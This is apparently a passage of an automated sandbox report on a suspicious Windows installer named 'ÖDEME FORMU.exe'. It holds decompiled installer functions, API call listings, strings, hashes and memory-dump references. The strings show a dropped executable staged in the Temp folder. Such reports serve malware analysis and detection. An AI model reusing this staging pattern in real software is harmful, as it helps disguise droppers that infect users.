					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A68();
					_t39 = E00402A68();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x3c) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x3c);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x3c));
					E00405A52();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x00401bf8
0x00401c01
0x00401c0d
0x00401c10
0x00401c1a
0x00401c1a
0x00401c1d
0x00401c21
0x00401c2b
0x00401c2b
0x00401c2e
0x00401c32
0x00401c34
0x00401c81
0x00401c83
0x00401c8c
0x00401c94
0x00401c97
0x00401c97
0x00401ca0
0x00000000
0x00401c36
0x00401c3d
0x00401c3f
0x00401c47
0x00401c4a
0x00401c72
0x00401ca6
0x00401ca6
0x00401c4c
0x00401c5a
0x00401c62
0x00401c65
0x00401c65
0x00401c4a
0x00401ca9
0x00401cac
0x00401cb2
0x004028c2
0x004028c2
0x0040291d
0x00402929

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C5A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C72

Strings

!, xrefs: 00401C2E

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
Instruction ID: 5a4a2a8e5e05dedb88239c733a2ad51f89d43fb5ccd06698c145dfd913d610d3
Opcode Fuzzy Hash: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
Instruction Fuzzy Hash: CD217C71E44108BFEF029FB0C94AAAD7BB5EB44308F14457AF901B61E1DBB98A419B58

Uniqueness

Uniqueness Score: -1.00%

Function 00403955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00403955(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405A6B(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f28; // 0x6ddfd8
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423700 = _t18[1];
					 *0x423fc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x4236fc = _t23;
						E00405A52(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420508, E00405B16(_t13, _t24, _t26, "fjvkkubvvke Setup", 0xfffffffe));
						_t11 =  *0x423f4c; // 0x2
						_t27 =  *0x423f48; // 0x6de184
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x6de19c
								_t11 = E00405B16(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403959
0x0040395e
0x00403964
0x00403969
0x00403969
0x00403971
0x00000000
0x00000000
0x00403973
0x00403979
0x00403981
0x00403983
0x00403989
0x00403989
0x0040398b
0x00403997
0x00000000
0x00000000
0x0040399b
0x00000000
0x00000000
0x00000000
0x0040399d
0x004039a2
0x004039ab
0x004039b1
0x004039b6
0x004039ca
0x004039d5
0x004039ed
0x004039f3
0x004039f8
0x00403a00
0x00403a21
0x00403a21
0x00403a21
0x00403a02
0x00403a04
0x00403a04
0x00403a08
0x00403a0b
0x00403a0f
0x00403a0f
0x00403a14
0x00403a1a
0x00403a1a
0x00000000
0x00403a04
0x004039b8
0x004039bd
0x004039c6
0x004039bf
0x004039bf
0x004039bf
0x004039bd

APIs

SetWindowTextA.USER32(00000000,fjvkkubvvke Setup), ref: 004039ED

Strings

1033, xrefs: 00403959, 00403963, 004039D4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403956
fjvkkubvvke Setup, xrefs: 004039DC

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\$fjvkkubvvke Setup
API String ID: 530164218-4229942485
Opcode ID: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
Instruction ID: 8a4911383cf402a951a33a18ad4b30e04e91385bd266f89a5cbd6e28b98f55da
Opcode Fuzzy Hash: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
Instruction Fuzzy Hash: A511C2B1B006119BC720DF15EC809377BBCEB88716769813BD901A73D1D73D9E028A58

Uniqueness

Uniqueness Score: -1.00%

Function 004059DB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004059DB(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				if(_t20 == 0) {
					_a8 = 0x400;
					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					return RegCloseKey(_a20);
				}
				return _t20;
			}

0x004059eb
0x004059ed
0x004059fa
0x00405a04
0x00405a0c
0x00405a11
0x00405a2d
0x00405a3b
0x00405a3b
0x00405a40
0x00000000
0x00405a46
0x00405a4f

APIs

RegOpenKeyExA.ADVAPI32(0041FD08,00000006,00000000,-00004250,-00004250,00000002,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,0041FD08,00000006,0041FD08), ref: 00405A04
RegQueryValueExA.ADVAPI32(-00004250,0041FD08,00000000,?,?,00000006,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,0041FD08), ref: 00405A25
RegCloseKey.ADVAPI32(-00004250,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,0041FD08), ref: 00405A46

Strings

C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph, xrefs: 004059DE

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
API String ID: 3677997916-154523629
Opcode ID: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
Instruction ID: ed18225876ffcc918a102faa5279ae5b239897be87de75614ca521a3281ae21e
Opcode Fuzzy Hash: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
Instruction Fuzzy Hash: 91015A7114120EEFDB128F64EC84AEB3FACEF14398F004536F954A6120D235D964DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004055E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055E7(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004055e8
0x004055ff
0x00405607
0x00405607
0x0040560f

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055ED
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055F6
lstrcatA.KERNEL32(?,00409010), ref: 00405607

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055E7

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction ID: 96202b13295bd2e64ca1d8ffa69cec5526f215a27c510a3f916c0d268ec15c79
Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
Instruction Fuzzy Hash: 27D0A9A2609A302AE20232158C09F8F7A28CF42341B450822F100B2292C23C3C818BEE

Uniqueness

Uniqueness Score: -1.00%

Function 00402366 Relevance: 6.1, APIs: 4, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402366(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t32;
				void* _t37;

				_t15 = E00402B7A(__eax);
				_t32 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x34) = E00402A85(2);
				_t18 = E00402A85(0x11);
				_t30 =  *0x423fd0; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t32 == 1) {
						E00402A85(0x23);
						_t19 = lstrlenA(0x409bf8) + 1;
					}
					if(_t32 == 4) {
						_t24 = E00402A68(3);
						 *0x409bf8 = _t24;
						_t19 = _t32;
					}
					if(_t32 == 3) {
						_t19 = E00402F71(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bf8, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t27,  *(_t37 - 0x30), 0x409bf8, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
				return 0;
			}

0x00402367
0x0040236c
0x00402376
0x00402380
0x00402383
0x0040238d
0x00402393
0x0040239d
0x004023a4
0x004023ac
0x004023ba
0x004023be
0x004023c9
0x004023c9
0x004023cd
0x004023d1
0x004023d7
0x004023dc
0x004023dc
0x004023e0
0x004023ec
0x004023ec
0x00402405
0x00402407
0x00402407
0x0040240a
0x004024e0
0x004024e0
0x0040291d
0x00402929

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A4
lstrlenA.KERNEL32(00409BF8,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C4
RegSetValueExA.ADVAPI32(?,?,?,?,00409BF8,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FD
RegCloseKey.ADVAPI32(?,?,?,00409BF8,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024E0

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
Instruction ID: 1ead33bacdad0c85318cdbd94ecebf1695d3cac277658b50cebc1fb2c1fe2d1b
Opcode Fuzzy Hash: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
Instruction Fuzzy Hash: 4A116071E00109BFEB109FA1EE89EAF7A78EB54398F11403AF905B71D1D6B85D019A68

Uniqueness

Uniqueness Score: -1.00%

Function 004021C8 Relevance: 6.1, APIs: 4, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004021C8(void* __eflags) {
				void* __ebx;
				char _t34;
				CHAR* _t36;
				CHAR* _t38;
				void* _t41;

				_t38 = E00402A85(_t34);
				 *(_t41 + 8) = _t38;
				_t36 = E00402A85(0x11);
				if(E00405D9C(_t38) != 0) {
					 *(_t41 - 0x54) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x50)) = 2;
					( &(_t38[1]))[lstrlenA(_t38)] = _t34;
					( &(_t36[1]))[lstrlenA(_t36)] = _t34;
					E00405B16(_t34, _t36, 0x409bf8, 0x409bf8, 0xfffffff8);
					lstrcatA(0x409bf8, _t36);
					 *(_t41 - 0x4c) =  *(_t41 + 8);
					 *(_t41 - 0x48) = _t36;
					 *(_t41 - 0x3a) = 0x409bf8;
					 *((short*)(_t41 - 0x44)) =  *((intOrPtr*)(_t41 - 0x1c));
					E00404E9F(_t34, 0x409bf8);
					if(SHFileOperationA(_t41 - 0x54) != 0) {
						goto L1;
					}
				} else {
					L1:
					E00404E9F(0xfffffff9, _t34);
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}

0x004021ce
0x004021d2
0x004021db
0x004021e4
0x004021f7
0x004021fa
0x00402207
0x00402218
0x0040221c
0x00402223
0x0040222c
0x00402234
0x00402237
0x0040223a
0x0040223e
0x0040224f
0x00000000
0x00402255
0x004021e6
0x004021e6
0x004021e9
0x004026bf
0x004026bf
0x0040291d
0x00402929

APIs

Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560), ref: 00405DAA
Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8

lstrlenA.KERNEL32 ref: 00402201
lstrlenA.KERNEL32(00000000), ref: 0040220B
lstrcatA.KERNEL32(00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402223
SHFileOperationA.SHELL32(?,?,00409BF8,00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402247

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ErrorFileFindModelstrlen$CloseFirstOperationlstrcat
String ID:
API String ID: 2246384517-0
Opcode ID: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
Instruction ID: a3fb08b87a3da4a4acbea606a4f252bd6f521f47b87daa54263f745b893ff540
Opcode Fuzzy Hash: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
Instruction Fuzzy Hash: 36119171E04215AACB10EFEA8D4498EB7B8AF45314F10813BF510F72D2DABC99418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401F20 Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401F20(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E00402A85(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 0x3c) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x34 = __ebp - 8;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 8, __ebp - 0x34) != 0) {
								 *(__ebp - 8) = E00405A52(__esi,  *((intOrPtr*)( *(__ebp - 8) + 8)));
								 *(__ebp - 8) = E00405A52(__edi,  *((intOrPtr*)( *(__ebp - 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401f22
0x00401f2a
0x00401f2f
0x00401f34
0x00401f38
0x00401f3b
0x00401f3d
0x00401f44
0x00401f4d
0x00401f55
0x00401f58
0x00401f6d
0x00401f73
0x00401f86
0x00401f8f
0x00401f9b
0x00401fa0
0x00401fa0
0x00401f86
0x00401fa3
0x00401bc0
0x00401bc0
0x00401f58
0x0040291d
0x00402929

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F2F
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F4D
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F66
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F7F

Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
Instruction ID: 664519773470a51a07128ab34de84be56150192837950b593d79a90dcc03585f
Opcode Fuzzy Hash: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
Instruction Fuzzy Hash: 3F115EB1A00108BFDB01AFA5DD81EEEBBB8EF44344F10803AF505F21A1D7789A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401D68() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093bc->lfHeight =  ~(MulDiv(E00402A68(2), _t6, 0x48));
				 *0x4093cc = E00402A68(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093d3 = 1;
				 *0x4093d0 = _t11 & 0x00000001;
				 *0x4093d1 = _t11 & 0x00000002;
				 *0x4093d2 = _t11 & 0x00000004;
				E00405B16(_t18, _t24, _t26, 0x4093d8,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093bc);
				_push(_t14);
				_push(_t26);
				E00405A52();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d76
0x00401d8f
0x00401d99
0x00401d9e
0x00401da9
0x00401db0
0x00401dc2
0x00401dc8
0x00401dcd
0x00401dd7
0x0040251b
0x00401569
0x004028c2
0x0040291d
0x00402929

APIs

GetDC.USER32(?), ref: 00401D6F
GetDeviceCaps.GDI32(00000000), ref: 00401D76
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D85
CreateFontIndirectA.GDI32(004093BC), ref: 00401DD7

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
Instruction ID: ab44fcfaedae078b8a2075b08ba9bdacc1048924ee142b10c901050df09d38a1
Opcode Fuzzy Hash: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
Instruction Fuzzy Hash: C8F04471949240AFEB015BB0AE1AB9A3B689719705F145479F641B61E3C6BC19048F2E

Uniqueness

Uniqueness Score: -1.00%

Function 00404DEF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DEF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420518 != _t22) {
							 *0x420518 = _t22;
							E00405AF4(0x420530, 0x424000);
							E00405A52(0x424000, _t22);
							E0040140B(6);
							E00405AF4(0x424000, 0x420530);
						}
						L11:
						return CallWindowProcA( *0x420520, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040476E(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F41(0x413);
				return 0;
			}

0x00404dfb
0x00404e20
0x00404e40
0x00404e43
0x00404e46
0x00404e5d
0x00404e63
0x00404e6a
0x00404e71
0x00404e78
0x00404e7d
0x00404e83
0x00000000
0x00404e93
0x00404e2d
0x00404e80
0x00404e80
0x00000000
0x00404e80
0x00404e39
0x00404e3b
0x00000000
0x00404e3b
0x00404e01
0x00000000
0x00000000
0x00404e08
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404E25
CallWindowProcA.USER32 ref: 00404E93

Part of subcall function 00403F41: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403F53

Strings

, xrefs: 00404DFD

Memory Dump Source

